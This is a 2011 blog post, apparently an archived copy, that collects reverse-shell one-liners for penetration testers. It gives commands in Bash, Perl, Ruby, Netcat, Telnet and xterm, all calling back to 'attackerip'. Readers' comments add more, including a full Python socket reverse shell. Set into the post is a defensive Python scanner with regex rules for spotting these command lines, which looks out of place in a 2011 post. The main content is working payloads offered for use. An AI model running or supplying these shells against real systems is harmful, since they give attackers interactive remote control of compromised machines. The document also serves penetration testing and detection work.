4/12/2018 Reverse shells one-liners

14th September 2011 Reverse shells one-liners


Inspired by the great blog post [http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet] by pentestmonkey.net [http://pentestmonkey.net/], I put together the following extra methods and alternatives for some of the methods explained in the cheat sheet. There is nothing cutting edge here; however, you may find it handy during your penetration tests.

Citing pentestmonkey's blog post:

If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon
afterwards you’ll probably want an interactive shell.

[...] your next step is likely to be either throwing back a reverse shell or binding a shell to a TCP
port.

Your options for creating a reverse shell are limited by the scripting languages installed on the target
system – though you could probably upload a binary program too if you’re suitably well prepared.

First of all, on your machine, set up a listener, where attackerip is your IP address and 4444 is an arbitrary TCP port unfiltered by the target's firewall:

attacker$ nc -l -v attackerip 4444

Bash

Alternatives for Bash shell:

exec /bin/bash 0&0 2>&0

Or:

0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

Or:

exec 5<>/dev/tcp/attackerip/4444 
cat <&5 | while read line; do $line 2>&5 >&5; done  # or: 
while read line 0<&5; do $line 2>&5 >&5; done

See also Reverse Shell With Bash [http://www.gnucitizen.org/blog/reverse-shell-with-bash/] from the GNUCITIZEN blog [http://www.gnucitizen.org/blog/].

Perl

Shorter Perl reverse shell that does not depend on /bin/sh:

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

If the target system is running Windows use the following one-liner:

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Ruby


Longer Ruby reverse shell that does not depend on /bin/sh:

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

If the target system is running Windows use the following one-liner:

ruby -rsocket -e 'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Netcat

Other possible Netcat reverse shells, depending on the Netcat version and compilation flags:

nc -c /bin/sh attackerip 4444

Or:

/bin/sh | nc attackerip 4444

Or:

rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/p

See also 7 Linux Shells Using Built-in Tools [http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/] from the LaNMaSteR53 blog [http://lanmaster53.com/].

Telnet

Of course, you can also use Telnet as an alternative for Netcat:

rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0/tmp/p

Or:

telnet attackerip 4444 | /bin/bash | telnet attackerip 4445   # Remember to listen on your machine also on port 4445/tcp

xterm

Here are further details on the xterm reverse shell:

To catch the incoming xterm, start an open X Server on your system (display :1, which listens on TCP port 6001). One way to do this is with Xnest [http://www.xfree86.org/4.4.0/Xnest.1.html]:

Xnest :1

Then remember to authorise the target IP on your system, so that it is allowed to connect to your X Server:

xterm -display 127.0.0.1:1  # Run this OUTSIDE the Xnest
xhost +targetip             # Run this INSIDE the spawned xterm on the open X Server

Then on the target, assuming that xterm is installed, connect back to the open X Server on your system:

xterm -display attackerip:1

Or:

$ DISPLAY=attackerip:0 xterm

It will try to connect back to you, attackerip, on TCP port 6001.

Note that on Solaris the xterm directory is usually not in the PATH environment variable, so you need to specify its full path:

/usr/openwin/bin/xterm -display attackerip:1
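From the defender's side, the one-liner families catalogued above share a handful of stable command-line markers (a /dev/tcp path, nc with -c or -e and a shell, a mknod FIFO chained to nc or telnet, perl with IO::Socket::INET and system, ruby with TCPSocket and IO.popen, xterm pointed at a non-loopback display). The following Python scanner is an added example, not code from the original post: the rule set and the process records it runs over are constructed here, with 10.0.0.5 standing in for attackerip.

```python
import re

# Detection rules for the one-liner families catalogued on this page.
# Constructed for this example; tune them to your own process telemetry.
RULES = [
    ("bash_dev_tcp", re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
    ("netcat_exec", re.compile(r"\bnc\b.*\s-[ce]\s+/bin/(?:ba)?sh")),
    ("netcat_pipe", re.compile(r"/bin/(?:ba)?sh\s*\|\s*nc\b")),
    ("fifo_relay", re.compile(r"mknod\s+\S+\s+p\b.*\b(?:nc|telnet)\b")),
    ("telnet_double", re.compile(r"telnet\b.*\|\s*/bin/(?:ba)?sh\s*\|\s*telnet\b")),
    ("perl_socket_shell", re.compile(r"perl\b.*IO::Socket::INET.*\bsystem\b")),
    ("ruby_socket_shell", re.compile(r"ruby\b.*TCPSocket\.new.*IO\.popen")),
    # xterm pointed at a non-loopback display, via -display or DISPLAY=
    ("xterm_remote_display", re.compile(
        r"(?:xterm\b.*-display\s+|DISPLAY=(?=\S+\s+xterm\b))"
        r"(?!127\.0\.0\.1|localhost)\S+:\d+")),
]

def classify(cmdline):
    """Return the names of every rule the command line matches."""
    return [name for name, pat in RULES if pat.search(cmdline)]

def scan(records):
    """Scan (pid, cmdline) records; return (pid, rule names) for hits only."""
    hits = []
    for pid, cmd in records:
        matched = classify(cmd)
        if matched:
            hits.append((pid, matched))
    return hits

# Constructed sample process records (not real telemetry); 10.0.0.5 stands
# in for the operator host the page calls attackerip.
SAMPLE = [
    (4011, "bash -c '0<&196;exec 196<>/dev/tcp/10.0.0.5/4444; sh <&196 >&196 2>&196'"),
    (4012, "nc -c /bin/sh 10.0.0.5 4444"),
    (4013, "sh -c 'rm -f /tmp/p; mknod /tmp/p p && telnet 10.0.0.5 4444'"),
    (4014, "perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,\"10.0.0.5:4444\");system$_ while<>;'"),
    (4015, "ruby -rsocket -e 'c=TCPSocket.new(\"10.0.0.5\",\"4444\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'"),
    (4016, "xterm -display 10.0.0.5:1"),
    (4017, "DISPLAY=10.0.0.5:0 xterm"),
    (4018, "xterm -display 127.0.0.1:1"),   # local display: benign
    (4019, "nc -l -v 127.0.0.1 4444"),        # plain listener: no shell bound
    (4020, "cat /var/log/syslog | grep -i tcp"),
]

if __name__ == "__main__":
    for pid, names in scan(SAMPLE):
        print(pid, ",".join(names))
```

The patterns are intentionally narrow so that ordinary pipelines and local X sessions do not fire; an alert should still be confirmed against the process's parent (a web server or interpreter spawning a shell is the interesting case) and its outbound connection.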

Posted 14th September 2011 by Bernardo Damele A. G.


Labels: bash, connection, linux, nc, netcat, perl, reverse, ruby, shell, solaris, telnet, xterm

9 comments

Nafeez Ahmed Wednesday, September 14, 2011


Good one!

jcran Thursday, September 15, 2011


+1 for the xterm, definitely going to make use of that.

Anonymous Thursday, September 29, 2011


I'm no Python guru, but Dave Kennedy posted this code and you might be able to one-line this:

#!/usr/bin/python
# imports here
import socket,subprocess

HOST = '10.16.44.100' # The remote host
PORT = 443 # The same port as used by the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect to attacker machine
s.connect((HOST, PORT))
# send we are connected
s.send('[*] Connection Established!')
# start loop
while 1:
    # receive shell command
    data = s.recv(1024)
    # if its quit, then break out and close socket
    if data == "quit": break
    # do shell command
    proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                            stdin=subprocess.PIPE)
    # read output
    stdout_value = proc.stdout.read() + proc.stderr.read()
    # send output to attacker
    s.send(stdout_value)
# close socket
s.close()

Cheers,
@DGleebits

chao-mu Saturday, October 15, 2011


This Perl one-liner connects to a server and evaluates the server's messages as Perl expressions, responding with
the result of those expressions. I wrote it to be short enough to be of a tweetable length and one line; it's not
good/modern Perl.

print $sock eval(<$sock>) while ($sock ||= IO::Socket::INET->new(PeerAddr => "127.0.0.1", PeerPort => "23666"))

wof Wednesday, March 04, 2015


The original Perl example doesn't work any more since the import of IO is deprecated. The fix is:

perl -MIO::Socket -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr => "127.0.0.1:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

wof Wednesday, March 04, 2015


Simple nc variant with two connections:
nc localhost 1233 | /bin/sh | nc 127.0.0.1 1234

Darwin Wednesday, June 03, 2015


I think there is a minor typo in the FIFO file object example of both netcat and telnet.

I think it should have been

Netcat
rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/p 2>&1

Telnet
rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0/tmp/p 2>&1

Darwin Thursday, June 04, 2015


I think I am missing something. I am not quite sure how the following would allow for reverse shell access:

exec /bin/bash 0&0 2>&0


Replies

cameron maerz Saturday, August 01, 2015


It wouldn't, but this does:
/bin/bash -i >& /dev/tcp/attackerip/4444 0>&1
